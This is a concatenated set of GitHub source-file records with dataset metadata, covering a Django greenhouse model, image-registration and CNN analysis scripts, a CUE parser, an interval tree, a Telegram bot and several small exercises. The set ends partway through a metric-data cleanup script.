django.contrib.auth.models import User\n\n\nclass SensorData(models.Model):\n\tSOIL_MOISTURE = (\n\t\t('wet','Wet'),\n\t\t('dry', 'Dry'),\n\t)\n\t\n\ttemperature = models.DecimalField(blank=False, null=False, max_digits = 7, decimal_places = 2)\n\thumidity = models.DecimalField(blank=False, null=False, max_digits = 7, decimal_places = 2)\n\tsoil_moisture_state = models.CharField(max_length = 10, choices = SOIL_MOISTURE)\n\tdate_recorded = models.DateTimeField('Date Recorded', auto_now=True)\n\n\tclass Meta:\n\t\tordering = ('-date_recorded',)\n\n\tdef __str__(self):\n\t\treturn 'Recorded: ' + str(self.date_recorded)\n\nclass ActivityMeta(models.Model):\n\tACTIVITY_CHOICES = (\n\t\t('open_vent','Open Vent'),\n\t\t('close_vent','Close Vent'),\n\t\t('lights_on','Lights On'),\n\t\t('lights_off','Lights Off'),\n\t\t('start_fan','Start Fan'),\n\t\t('stop_fan','Stop Fan'),\n\t\t('water_crops','Water Crops'),\n\t)\n\tactivity = 
models.CharField(\n\t\tmax_length = 20,\n\t\tchoices = ACTIVITY_CHOICES\n\t)\n\tuser = models.ForeignKey(User,on_delete=models.CASCADE)\n\tdate_recorded = models.DateTimeField(default=timezone.now)\n\t\n\tclass Meta:\n\t\tordering = ('-date_recorded',)\n\t\n\tdef __str__(self):\n\t\treturn 'Recorded: ' + str(self.date_recorded) + ' by ' + str(self.user)","repo_name":"rickynyairo/Raspberry-Pi-Greenhouse-with-Django","sub_path":"ghapp/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1268,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"17193732572","text":"from netResponses import *\nfrom ConCat import *\nimport pickle\n# code is broken up into different functions\n\ndef runNetResponses():\n\n # loading animal pictures in data/ directory\n # assuming two categories per context, only two contexts\n # contexts : pets and nonpets\n # categories in pets : cats and dogs (5 images in each category)\n # categories in nonpets: spider and turtle ( 5 images in each category)\n # and five pictures per category\n # you can change this code to reflect your actual data and analysis\n contexts = listdir('data/STIMULI-Shira-F73')\n for i in range(len(contexts)):\n contexts[i] = \"data/STIMULI-Shira-F73/\" + contexts[i]\n directoriesForAnalysis = contexts\n # now we don't want to put a limit on number of file to load for now\n # startFileNumber = 1 \n # endFileNumber = 10\n # filePaths = organize_paths_for(directoriesForAnalysis, endFileNumber)\n filePaths = organize_paths_for(directoriesForAnalysis)\n cnnModel = 'Vgg16'\n\n outputName = cnnModel\n\n # get layer responses for all pictures\n dictionary = find_max_neurons_and_layers_for(outputName, directoriesForAnalysis, filePaths, cnnModel)\n\n # store this dictionary data in a pickle file\n if os.path.exists(\"NeuralLayersDict_stimuli_Data\") == False:\n os.mkdir(\"NeuralLayersDict_stimuli_Data\")\n print(\"creating a pickle file ...\")\n pickle_file = open(\"NeuralLayersDict_stimuli_Data/NeuralLayersDictionary.pkl\", \"wb\")\n pickle.dump(dictionary,pickle_file)\n pickle_file.close()\n print(\"done!\")\n # set up the variable numberOfDataPoints\n numberOfDataPoints = number_of_scatterplot_dots(directoriesForAnalysis)\n\n # save inter-image distances\n run_analytics_suite(dictionary, outputName, filePaths, numberOfDataPoints)\n\n\ndef get_layer_ratios():\n contexts = listdir('data/STIMULI-Shira-F73')\n for i in range(len(contexts)):\n contexts[i] = \"data/STIMULI-Shira-F73/\" + contexts[i]\n directoriesForAnalysis = contexts\n\n filePaths = organize_paths_for(directoriesForAnalysis)\n\n with open(\"layer_category_data.pkl\",'rb') as layCat:\n layCat_df = pickle.load(layCat)\n\n with open(\"layer_context_data.pkl\",'rb') as layCon:\n layCon_df = pickle.load(layCon)\n\n layCon_df.index = os.listdir(\"./data/STIMULI-Shira-F73/\")\n\n ratioCols = list()\n c = 3\n while c <= (len(layCon_df.columns)+2):\n ratioCols.append(layCon_df.columns[c-1])\n c+=3\n print(ratioCols)\n\n topFiveCon = dict()\n bottomFiveCon = dict()\n for layer in ratioCols:\n t5 = layCon_df[layer].sort_values(ascending = False).iloc[0:5]\n topFiveCon[layer+\"_top5\"] = tuple(zip(t5.index,t5.values))\n b5 = layCon_df[layer].sort_values().iloc[0:5]\n bottomFiveCon[layer+\"_least5\"] = tuple(zip(b5.index,b5.values))\n\n pandas.DataFrame(topFiveCon).to_csv(\"topFiveContexts.csv\")\n pandas.DataFrame(bottomFiveCon).to_csv(\"bottomFiveContexts.csv\")\n\n\n categories = list()\n for i in range(1,len(filePaths),5):\n 
categories.append(filePaths[i])\n print(len(categories))\n print(categories)\n\n layCat_df.index = categories\n\n topFiveCat = dict()\n bottomFiveCat = dict()\n for layer in ratioCols:\n t5 = layCat_df[layer].sort_values(ascending = False).iloc[0:5]\n topFiveCat[layer+\"_top5\"] = tuple(zip(t5.index,t5.values))\n b5 = layCat_df[layer].sort_values().iloc[0:5]\n bottomFiveCat[layer+\"_least5\"] = tuple(zip(b5.index,b5.values))\n\n pandas.DataFrame(topFiveCat).to_csv(\"topFiveCategories.csv\")\n pandas.DataFrame(bottomFiveCat).to_csv(\"bottomFiveCategories.csv\")\n \n \n# compute ratio of in-category/out-category and in-context/out-context\ndef runConCat():\n computeRatios()\n\n# Currently we run nothing, but can un-comment one line to either \n# 1) compute outputs of network for particular data (runNetResponses)\n# 2) compute in/out ratios at each layer (runConCat)\n# runNetResponses()\n# runConCat()\nget_layer_ratios()\n\n","repo_name":"rahul-ohlan/CnnContext","sub_path":"pretrainStudy/SciRepSimul.py","file_name":"SciRepSimul.py","file_ext":"py","file_size_in_byte":3989,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"8238668862","text":"from docx import Document\nfrom docx.shared import Inches\n\ndocument = Document()\n\n# profile picture\ndocument.add_picture('me.jpg', width=Inches(2.0))\n\n# name phone number and email details\nname = input('What is your name? ')\nphone_number = input('What is your phone number? ')\nemail = input('What is your email? ')\n\ndocument.add_paragraph(name.capitalize() + ' | ' + phone_number + ' | ' + email)\n\n# about me\ndocument.add_heading('About Me')\nabout_me = input('Tell me about yourself: ')\ndocument.add_paragraph(about_me)\n\n# experience one\ndocument.add_heading('Work Experience')\np = document.add_paragraph()\n\ncompany = input('Enter company: ')\nfrom_date = input('Enter from date: ')\nto_date = input('Enter to date: ')\nposition_roles = input('Describe your roles: ')\n\np.add_run(company + ' ').bold = True\np.add_run(from_date + ' - ' + to_date + '\\n').italic = True\np.add_run(position_roles)\n\n# more experiences\nwhile True:\n has_more_experiences = input('Do you have more experiences? \\'Yes\\' or \\'No\\'')\n if has_more_experiences.lower() == 'yes':\n p = document.add_paragraph()\n\n company = input('Enter company: ')\n from_date = input('Enter from date: ')\n to_date = input('Enter to date: ')\n position_roles = input('Describe your roles: ')\n\n p.add_run(company + ' ').bold = True\n p.add_run(from_date + ' - ' + to_date + '\\n').italic = True\n p.add_run(position_roles)\n\n else:\n break\n\n# skills\ndocument.add_heading('My Skills')\nskill = input('Enter skill 1: ')\np_skills = document.add_paragraph(skill)\np_skills.style = 'List Bullet'\n\n#more skills\nwhile True:\n has_more_skills = input('Do you have more skills? 
\\'Yes\\' or \\'No\\'')\n if has_more_skills.lower() == 'yes':\n skill = input('Enter skill 1: ')\n p_skills = document.add_paragraph(skill)\n p_skills.style = 'List Bullet'\n else:\n break\n\n#footer\nsection = document.sections[0]\nfooter = section.footer\np = footer.paragraphs[0]\np.text = 'Made in Kenya!'\n\ndocument.save('cv.docx')\n","repo_name":"makaucodes/cvbuilder-teminal","sub_path":"cvbuilderapp.py","file_name":"cvbuilderapp.py","file_ext":"py","file_size_in_byte":2030,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17771267504","text":"import argparse\nimport os\nimport time\n\nimport torch\nimport numpy as np\n\n\n# import voxelmorph with pytorch backend\nos.environ['VXM_BACKEND'] = 'pytorch'\nimport voxelmorph as vxm\n\ndef process_image_pair(moving_path, atlas_path, output_dir, model_path, pair_index):\n # load moving and atlas images\n add_feat_axis = not args.multichannel\n moving = vxm.py.utils.load_volfile(moving_path, add_batch_axis=True, add_feat_axis=add_feat_axis)\n atlas, atlas_affine = vxm.py.utils.load_volfile(atlas_path, add_batch_axis=True, add_feat_axis=add_feat_axis,\n ret_affine=True)\n\n # Find the minimum and maximum values in the moving array to estimate the range\n min_value = np.min(moving)\n max_value = np.max(moving)\n\n # Normalize the moving array to the range [0, 1] and convert to float32\n moving = (moving - min_value) / (max_value - min_value)\n # load and set up model\n model = vxm.networks.VxmDense.load(model_path, device)\n model.to(device)\n model.eval()\n\n # set up tensors and permute\n input_moving = torch.from_numpy(moving).to(device).float().permute(0, 4, 1, 2, 3)\n input_atlas = torch.from_numpy(atlas).to(device).float().permute(0, 4, 1, 2, 3)\n\n # measure time taken for prediction\n start_time = time.time()\n moved, warp = model(input_moving, input_atlas, registration=True)\n end_time = time.time()\n elapsed_time = end_time - start_time\n\n # create output directories if they don't exist\n os.makedirs(output_dir, exist_ok=True)\n moved_output_dir = os.path.join(output_dir, \"predicted_images\")\n warp_output_dir = os.path.join(output_dir, \"warp_files\")\n os.makedirs(moved_output_dir, exist_ok=True)\n os.makedirs(warp_output_dir, exist_ok=True)\n\n # save moved image\n moved_output_path = os.path.join(moved_output_dir, f\"predicted_{pair_index}.nii.gz\")\n moved = moved.detach().cpu().numpy().squeeze()\n vxm.py.utils.save_volfile(moved, moved_output_path, atlas_affine)\n\n # save warp\n warp_output_path = os.path.join(warp_output_dir, f\"warp_{pair_index}.nii.gz\")\n warp = warp.detach().cpu().numpy().squeeze()\n vxm.py.utils.save_volfile(warp, warp_output_path, atlas_affine)\n\n return moved_output_path, warp_output_path, elapsed_time\n\n\n# parse commandline args\nparser = argparse.ArgumentParser()\nparser.add_argument('--moving-dir', default=\"/media/user/Fish-free11/usman/ali/movingtest/movingtest_resized2\",\n help='directory containing moving images')\nparser.add_argument('--atlas', default=\"/media/user/Fish-free11/usman/ali/atlas2/atlas.nii.gz\",\n help='atlas image file')\nparser.add_argument('--output-dir', default=\"/media/user/Fish-free11/usman/ali/output_images/\", help='directory to save output images and warps')\nparser.add_argument('--model', default=\"/media/Usman/pythonUsman/scripts/torch/models/0088.pt\", help='pytorch model for nonlinear registration')\nparser.add_argument('--gpu', default=0, help='GPU number(s) - if not supplied, CPU is 
used')\nparser.add_argument('--multichannel', action='store_true', help='specify that data has multiple channels')\nargs = parser.parse_args()\n\n# device handling\nif args.gpu and (args.gpu != '-1'):\n device = 'cuda'\n os.environ['CUDA_VISIBLE_DEVICES'] = args.gpu\nelse:\n device = 'cpu'\n os.environ['CUDA_VISIBLE_DEVICES'] = '-1'\n\n# get the list of moving image files\nmoving_files = sorted(os.listdir(args.moving_dir))\n\n# create output directories if they don't exist\nos.makedirs(args.output_dir, exist_ok=True)\nmoved_output_dir = os.path.join(args.output_dir, \"predicted_images\")\nwarp_output_dir = os.path.join(args.output_dir, \"warp_files\")\nos.makedirs(moved_output_dir, exist_ok=True)\nos.makedirs(warp_output_dir, exist_ok=True)\n\ntotal_time = 0 # Initialize total time\n\n# process each image pair\nfor i, moving_file in enumerate(moving_files):\n moving_path = os.path.join(args.moving_dir, moving_file)\n\n # process the image pair\n pair_index = i + 1\n moved_output_path, warp_output_path, elapsed_time = process_image_pair(moving_path, args.atlas, args.output_dir, args.model,\n pair_index)\n print(f\"Image pair {pair_index} processed. Predicted image saved to {moved_output_path}, Warp saved to {warp_output_path}\")\n print(f\"Time taken: {elapsed_time} seconds\")\n\n total_time += elapsed_time # Update total time\n\nprint(f\"Total time taken for all {len(moving_files)} image pairs: {total_time} seconds\")\n","repo_name":"tagodong/tgd","sub_path":"Voxelmorph/scripts/torch/register_updated.py","file_name":"register_updated.py","file_ext":"py","file_size_in_byte":4525,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"40322231524","text":"# -*- coding: utf-8 -*-\n\nimport re\nimport codecs\nfrom collections import defaultdict\n\nfrom ..utils import trim_quote, read_file, to_unicode as u\nfrom ..meta import Meta\n\n\nclass _CUEParseHandle(object):\n\n def __init__(self):\n self.stag = []\n self.svalue = []\n self.slen = 0\n self.metas = []\n\n def push(self, tag, value):\n self.stag.append(tag)\n self.svalue.append(value)\n self.slen += 1\n\n def pop(self):\n if self.slen > 0:\n self.slen -= 1\n tag = self.stag.pop()\n value = self.svalue.pop()\n return tag, value\n return None, None\n\n def pop_until(self, tag):\n try:\n i = self.stag.index(tag)\n self.stag = self.stag[:i]\n self.svalue = self.svalue[:i]\n self.slen = i\n except ValueError:\n return\n\n def extract(self):\n meta = Meta(_source=u\"CUE\")\n for i in xrange(self.slen):\n meta.set_tag(self.stag[i], self.svalue[i])\n self.metas.append(meta)\n\n def has_tag(self, tag):\n return tag in self.stag\n\n def next_token(self, tag, value):\n if self.has_tag(tag):\n self.extract()\n self.pop_until(tag)\n self.push(tag, value)\n\n def finish(self):\n self.extract()\n self.set_begin_time()\n self.analyse_time()\n\n def build_time_table(self):\n \"\"\"\n Build a time table which each item has time and its tracknumber.\n \"\"\"\n time_table = defaultdict(set)\n for meta in self.metas:\n if u\"_time_begin\" in meta:\n time_table[meta[u\"_file\"]].add(meta[u\"_time_begin\"])\n\n for _f, _l in time_table.items():\n time_table[_f] = sorted(_l, key=_cue_time_to_int)\n\n return time_table\n\n def analyse_time(self):\n \"\"\"\n Analyse the time in all metas.\n \"\"\"\n time_table = self.build_time_table()\n\n for meta in self.metas:\n if meta[u\"_file\"] not in time_table:\n continue\n\n if u\"_time_begin\" in meta:\n index = 
time_table[meta[u\"_file\"]].index(meta[u\"_time_begin\"])\n if index == len(time_table[meta[u\"_file\"]]) - 1:\n continue\n meta[u\"_time_end\"] = time_table[meta[u\"_file\"]][index + 1]\n\n def set_begin_time(self):\n for meta in self.metas:\n _set_meta_begin_time(meta)\n\n\ndef _set_meta_begin_time(meta):\n if not isinstance(meta, Meta):\n raise TypeError(\"Only Meta instance is allowed\")\n\n if u\"INDEX 00\" in meta:\n meta[u\"_time_begin\"] = meta[u\"INDEX 00\"]\n elif u\"INDEX 01\" in meta:\n meta[u\"_time_begin\"] = meta[u\"INDEX 01\"]\n else:\n meta[u\"_time_begin\"] = u\"00:00:00\"\n\n\ndef _cue_time_to_int(cue_time):\n \"\"\"\n Convert an item from time table, take the CUE time and convert it to integer.\n \"\"\"\n r = re.match(u'''(\\d+):(\\d{2}):(\\d{2})''', cue_time)\n if r is None:\n raise ValueError(\"Invalid CUE Time: %s\" % cue_time)\n\n return int(u\"%s%s%s\" % r.groups())\n\n\ndef _matched_line_rem(textline, cue_handle):\n r = re.search(u'''REM\\s+(?P[^\\s]+)\\s+(?P.+)''',\n textline)\n\n if not r: return False\n\n _tag = u(trim_quote(r.groupdict()[\"rem_tag\"].strip())).upper()\n _value = u(trim_quote(r.groupdict()[\"rem_value\"].strip()))\n\n cue_handle.next_token(_tag, _value)\n return True\n\n\ndef _matched_line_performer(textline, cue_handle):\n r = re.search(u'''PERFORMER\\s+(?P.+)$''',\n textline)\n\n if not r: return False\n\n _performer = u(trim_quote(r.groupdict()[\"performer\"].strip()))\n\n if cue_handle.has_tag(u\"ALBUMARTIST\"):\n cue_handle.next_token(u\"ARTIST\", _performer)\n else:\n cue_handle.next_token(u\"ALBUMARTIST\", _performer)\n return True\n\n\ndef _matched_line_title(textline, cue_handle):\n r = re.search(u'''TITLE\\s+(?P.+)''',\n textline)\n\n if not r: return False\n\n _title = u(trim_quote(r.groupdict()[\"title\"].strip()))\n\n if cue_handle.has_tag(u\"ALBUM\"):\n cue_handle.next_token(u\"TITLE\", _title)\n else:\n cue_handle.next_token(u\"ALBUM\", _title)\n return True\n\n\ndef _matched_line_file(textline, cue_handle):\n r = re.search(u'''FILE\\s+(?P<file>.+)\\s\\w+''',\n textline)\n\n if not r: return False\n\n _file = u(trim_quote(r.groupdict()[\"file\"].strip()))\n\n cue_handle.next_token(u\"_file\", _file)\n return True\n\n\ndef _matched_line_track(textline, cue_handle):\n r = re.search(u'''TRACK\\s+(?P<track_num>\\d+)\\s+AUDIO''',\n textline)\n\n if not r: return False\n\n _tracknum = u(int(trim_quote(r.groupdict()[\"track_num\"].strip())))\n\n cue_handle.next_token(u\"TRACKNUMBER\", _tracknum)\n return True\n\n\ndef _matched_line_index(textline, cue_handle):\n r = re.search(u'''INDEX\\s+(?P<index_num>\\d+)\\s+(?P<timing>.+)''',\n textline)\n\n if not r: return False\n\n _indexnum = u(trim_quote(r.groupdict()[\"index_num\"].strip()))\n _timing = u(trim_quote(r.groupdict()[\"timing\"].strip()))\n\n cue_handle.next_token(u\"INDEX %s\" % _indexnum, _timing)\n\n\ndef parse_cue(filename, encoding=\"utf_8\"):\n '''\n Parse a CUE file\n '''\n cue_handle = _CUEParseHandle()\n cue_content = read_file(filename, encoding=encoding)\n\n for textline in cue_content.split(u\"\\n\"):\n if _matched_line_rem(textline, cue_handle): continue\n if _matched_line_title(textline, cue_handle): continue\n if _matched_line_file(textline, cue_handle): continue\n if _matched_line_performer(textline, cue_handle): continue\n if _matched_line_track(textline, cue_handle): continue\n if _matched_line_index(textline, cue_handle): continue\n\n cue_handle.finish()\n cue_handle.analyse_time()\n\n return 
cue_handle.metas\n\n\n\n","repo_name":"Gateswong/GatesMusicPet","sub_path":"music_pet/playlist/cue.py","file_name":"cue.py","file_ext":"py","file_size_in_byte":5881,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"9008371920","text":"#!/usr/bin/env python3\n\nfrom collections import namedtuple\nfrom dataclasses import dataclass\nfrom typing import Optional\n\nInterval = namedtuple(\"Interval\", [\"low\", \"high\"])\n\n\n@dataclass\nclass Node:\n interval = Interval(0, 0)\n max_high = 0\n left: Optional[\"Node\"] = None\n right: Optional[\"Node\"] = None\n\n\nclass IntervalTree:\n def __init__(self) -> None:\n self.root: Node | None = None\n\n def check_overlap(self, interval_a: Interval, interval_b: Interval) -> bool:\n return interval_a.low <= interval_b.high and interval_a.high >= interval_b.low\n\n def insert(self, node: Node | None, interval: Interval) -> Node:\n if node is None:\n new_node = Node()\n new_node.interval = interval\n new_node.max_high = interval.high\n if self.root is None:\n self.root = new_node\n return new_node\n\n if interval.low < node.interval.low:\n node.left = self.insert(node.left, interval)\n else:\n node.right = self.insert(node.right, interval)\n\n if node.max_high < interval.high:\n node.max_high = interval.high\n\n return node\n\n def insert_intervals(self, intervals: Interval) -> None:\n for interval in intervals:\n self.insert(self.root, interval)\n\n def is_overlap(self, interval: Interval) -> Interval | None:\n return self.search_overlap(self.root, interval)\n\n def search_overlap(self, node: Node | None, interval: Interval) -> Interval | None:\n if node is None:\n return None\n\n if self.check_overlap(node.interval, interval):\n return node.interval\n\n if node.left and node.left.max_high >= interval.low:\n return self.search_overlap(node.left, interval)\n\n return self.search_overlap(node.right, interval)\n","repo_name":"xxyzz/WordDumb","sub_path":"interval.py","file_name":"interval.py","file_ext":"py","file_size_in_byte":1840,"program_lang":"python","lang":"en","doc_type":"code","stars":280,"dataset":"github-code","pt":"21"} +{"seq_id":"18271925017","text":"\"\"\"Test config functionality\n\"\"\"\nimport pytest\n\nfrom shellplot._config import get_option, set_option\n\n\ndef test_option_set_and_get():\n new_figsize = (50, 30)\n set_option(\"figsize\", new_figsize)\n figsize = get_option(\"figsize\")\n assert figsize == new_figsize\n\n\ndef test_not_implemented_option():\n with pytest.raises(NotImplementedError):\n set_option(\"not-existing-option\", 0)\n","repo_name":"CDonnerer/shellplot","sub_path":"tests/test_config.py","file_name":"test_config.py","file_ext":"py","file_size_in_byte":397,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"16538141831","text":"from os import system\nfrom random import randint\nsystem('cls') or None\n\ndict = {}\narray = []\nm=0\nmulheres=''\nwhile True:\n dict['nome'] = input(f'Nome: ')\n gen = input(f'Genero: [M/F] ').upper()\n while gen not in 'MF':\n gen = input(f'Genero: [M/F] ').upper()\n dict['genero'] = gen\n dict['idade'] = randint(18,40)\n array.append(dict.copy())\n\n if dict['genero'] in 'Ff':\n mulheres += dict['nome'] + ' '\n m += dict['idade']\n\n dict.clear()\n system('cls') or None\n\n looping = input(f'Quer continuar? [S/N] ')\n while looping not in 'SsNn':\n looping = input(f'Quer continuar? 
[S/N]')\n if looping in 'Nn':\n break\n\n\n\nend_array = []\nfor i in range(len(array)):\n if array[i]['idade'] > m/len(array):\n end_array.append(array[i])\n\nprint('-='*30)\nprint(f'- O grupo tem {len(array)} pessoas.')\nprint(f'- A média de idade é de {m/len(array):.2f}')\nprint(f'As mulheres cadastradas foram: {mulheres}')\nprint(f'Lista das pessoas que estão acima da média de idade:')\nfor j in range(len(end_array)):\n print(end_array[j])\n ","repo_name":"JoseClaudiolima/Python","sub_path":"Python-Desafios/d89 a d106/d94.py","file_name":"d94.py","file_ext":"py","file_size_in_byte":1091,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37486901495","text":"from bot_commands.help_commands import show_help, show_start, say_hello\nfrom bot_commands.translation_commands import start_translate_sketch_to_photo, start_translate_photo_to_sketch, receive_and_translate_sketch, cancel_generation\nfrom bot_commands.conversation_states import BotConversationStates\n\nfrom telegram import Update\nfrom telegram.ext import Updater, CommandHandler, MessageHandler, ConversationHandler, Filters, CallbackContext\n\nimport os\nfrom os.path import join, dirname\nfrom dotenv import load_dotenv\n\nif __name__ == '__main__':\n dotenv_path = join(dirname(__file__), '..', '.env')\n load_dotenv(dotenv_path)\n del dotenv_path\n\n updater = Updater(os.getenv('TELEGRAM_BOT_TOKEN'))\n\n updater.dispatcher.add_handler(CommandHandler('start', show_start))\n updater.dispatcher.add_handler(CommandHandler('help', show_help))\n updater.dispatcher.add_handler(CommandHandler('hello', say_hello))\n generation_conversation_handler = ConversationHandler(\n entry_points = [\n CommandHandler('sketch2photo', start_translate_sketch_to_photo),\n CommandHandler('photo2sketch', start_translate_photo_to_sketch),\n ],\n states={\n BotConversationStates.RECEIVE_SKETCH: [MessageHandler(Filters.photo, receive_and_translate_sketch)],\n },\n fallbacks=[CommandHandler('cancel', cancel_generation)]\n )\n updater.dispatcher.add_handler(generation_conversation_handler)\n\n updater.start_polling()\n updater.idle()\n","repo_name":"agentS/sketch2photoTelegramBot","sub_path":"src/bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":1495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"11638589365","text":"import numpy as np\nimport math\nimport random\n\n\ndef q(i):\n print(\"Question: \", i)\n\n\nq(1)\nn = 100\np = 0.75\nsize = 1000\nbinomial = np.random.binomial(n, p, size)\ndeviation = math.sqrt(p*(1-p)/n)\nmean = n * p\ntotal = 0\nfor i in binomial:\n if i > (mean + deviation * 2):\n total += 1\n\nprint(\"total 2 standard deviations above mean: \", total)\n\nq(2)\n\n\ndef guess(n):\n r = random.randrange(0, n)\n inp = int(input(\"enter your guess, 0-\" + str(n) + \": \"))\n if(inp > r):\n print(\"too high\")\n else:\n print(\"too low\")\n\n\nguess(100)\n\n\ndef approxPi(n):\n hits = 0\n for i in range(n):\n point = random.random() * 4\n if(point < math.pi):\n hits += 1\n print((hits * 4) / n)\n\n\napproxPi(100000)\n\n\ndef week():\n days = {\n \"Mo\": \"Monday\", \"Tu\": \"Tuesday\", \"We\": \"Wednesday\", \"Th\": \"Thursday\",\n \"Fr\": \"Friday\", \"Sa\": \"Saturday\", \"Su\": \"Sunday\"\n }\n inp = input(\"Enter Day abbreviation: \")\n if inp in days:\n print(days[inp])\n\n\nweek()\nq(3)\n\nyear_populations = [8.89, 10.16, 12.0, 13.9, 15.91, 17.93, 20.07, 22.71, 25.97, 29.0, 32.53, 36.07]\nout = []\nout_2 = 
[]\nfor i in range(len(year_populations) - 1):\n out.append(year_populations[i + 1] / year_populations[i])\n m = year_populations[i + 1] - year_populations[i]\n out_2.append(m / year_populations[i])\nprint(out)\nprint(out_2)\n\ninitial_amount = 16\ndecline = 0.25\n\nfor i in range(100):\n initial_amount = initial_amount * decline\n if initial_amount < 0.1:\n print(\"after \", i, \"hours drug is undetectable\")\n break\n","repo_name":"taydus30/Project-1","sub_path":"hw/hw8.py","file_name":"hw8.py","file_ext":"py","file_size_in_byte":1562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"37481516200","text":"\"\"\"\nTest on TO: compute the probability that unseen classes are assigned to known classes.\n\"\"\"\nimport os\nimport math\nimport argparse\n\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torch.optim.lr_scheduler as lr_scheduler\nfrom torchvision import transforms\nfrom torchsampler import ImbalancedDatasetSampler\nimport numpy as np\nfrom PIL import Image\n\nfrom my_dataset import MyDataSet\nfrom models.ViT import vit_base_patch16_224_in21k\nfrom models.ResNet import resnet34, resnet50, resnet101\nfrom models.EfficientNet import efficientnet_b3, efficientnet_b5, efficientnet_b7\nfrom models.Swin import swin_base_patch4_window7_224\nfrom utils import train_one_epoch, evaluate, plot_data_loader_image, plot_original_image\n\n\ndef main(args):\n # device: gpu or cpu\n device = torch.device(args.device if torch.cuda.is_available() else \"cpu\")\n\n # default image size is 224; only efficientnet needs a different size\n img_size = 224\n if 'EfficientNet' in args.model_name:\n # input image size for each EfficientNet variant\n efficientnet_img_size = {\"b0\": 224, \"b1\": 240, \"b2\": 260, \"b3\": 300, \"b4\": 380, \"b5\": 456, \"b6\": 528, \"b7\": 600}\n num_model = args.model_name[-2:]\n img_size = efficientnet_img_size[num_model]\n\n # data preprocessing\n data_transform = transforms.Compose([transforms.Resize([img_size, img_size]),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])])\n\n # create the model\n if args.model_name == 'ResNet50':\n model = resnet50(num_classes=args.num_classes).to(device)\n elif args.model_name == 'ResNet101':\n model = resnet101(num_classes=args.num_classes).to(device)\n elif args.model_name == 'ViT':\n model = vit_base_patch16_224_in21k(num_classes=args.num_classes, has_logits=False).to(device)\n elif args.model_name == 'EfficientNet_b3':\n model = efficientnet_b3(num_classes=args.num_classes).to(device)\n elif args.model_name == 'EfficientNet_b5':\n model = efficientnet_b5(num_classes=args.num_classes).to(device)\n elif args.model_name == 'EfficientNet_b7':\n model = efficientnet_b7(num_classes=args.num_classes).to(device)\n elif args.model_name == 'Swin':\n model = swin_base_patch4_window7_224(num_classes=args.num_classes).to(device)\n else:\n raise Exception(\"No model name {}\".format(args.model_name))\n\n # load the trained weights\n model_weight_path = './weights/{}-w.pth'.format(args.model_name)\n assert os.path.exists(model_weight_path), \"file {} does not exist.\".format(model_weight_path)\n pre_weights = torch.load(model_weight_path, map_location=device)\n model.load_state_dict(pre_weights, strict=False)\n\n # open-set test data\n test_data = np.load('../QHZJ/new_test_data_to.npy')\n test_label = np.load('../QHZJ/new_test_label_to.npy')\n\n # prediction\n model.eval()\n\n total = 0\n wrong = 0\n\n with torch.no_grad():\n for data in test_data:\n print(wrong, total)\n img = Image.fromarray(data)\n img = data_transform(img)\n img = torch.unsqueeze(img, dim=0)\n # predict class\n output = 
torch.squeeze(model(img.to(device)))\n predict = torch.softmax(output, dim=0)\n predict_cla = torch.argmax(predict).numpy()\n max_assumption = torch.max(predict)\n total += 1\n if max_assumption >= 0.7:\n wrong += 1\n\n print(f'Probability that {args.model_name} assigns unseen classes to known classes: {wrong / total:.3f}')\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n # number of classes\n parser.add_argument('--num_classes', type=int, default=1947)\n # number of training epochs\n parser.add_argument('--epochs', type=int, default=15)\n # batch size\n parser.add_argument('--batch-size', type=int, default=8)\n # learning rate\n parser.add_argument('--lr', type=float, default=0.001)\n # loss function\n parser.add_argument('--loss', type=str, default='CrossEntropyLoss')\n # final learning rate (multiplicative factor)\n parser.add_argument('--lrf', type=float, default=0.01)\n # model name, e.g. ResNet, ViT\n parser.add_argument('--model-name', default='EfficientNet_b3', help=\"eg:ResNet50 / ViT / EfficientNet_b7 / Swin\")\n # whether to freeze layers\n parser.add_argument('--freeze-layers', type=bool, default=False)\n # device\n parser.add_argument('--device', default='cuda:0', help='device id (i.e. 0 or 0,1 or cpu)')\n\n # parse arguments\n opt = parser.parse_args()\n\n main(opt)\n","repo_name":"Mythszj/QHZJ_classification","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":4600,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"8056682293","text":"import argparse\nimport logging\nimport sys\nimport time\n\nimport sqlalchemy as sql\n\nfrom nta.utils.error_handling import logExceptions\nfrom nta.utils.logging_support_raw import LoggingSupport\nfrom nta.utils import sqlalchemy_utils\n\n\nimport htmengine\nimport htmengine.repository\nfrom htmengine.repository import schema\n\n\n\n# Maximum number of rows to delete per query for reducing the likelihood of the\n# MySQL \"Lock wait timeout exceeded\" error\n_MAX_DELETE_BATCH_SIZE = 1000\n\n\n\n# How many seconds to sleep between garbage collection cycles\n_PAUSE_INTERVAL_SEC = 3600\n\n\n\ng_log = logging.getLogger(__name__)\n\n\n\ndef _parseArgs(args):\n \"\"\"Parse command-line arguments\n\n :param list args: the equivalent of sys.argv[1:]\n\n :returns: the args object generated by ``argparse.ArgumentParser.parse_args``\n with the following attributes:\n thresholdDays: Metric data rows with timestamps older than this number of\n days will be purged.\n\n \"\"\"\n parser = argparse.ArgumentParser(description=__doc__)\n\n parser.add_argument(\n \"--threshold-days\",\n type=int,\n required=True,\n dest=\"thresholdDays\",\n metavar=\"D\",\n help=(\"Metric data rows with timestamps older than this number of days 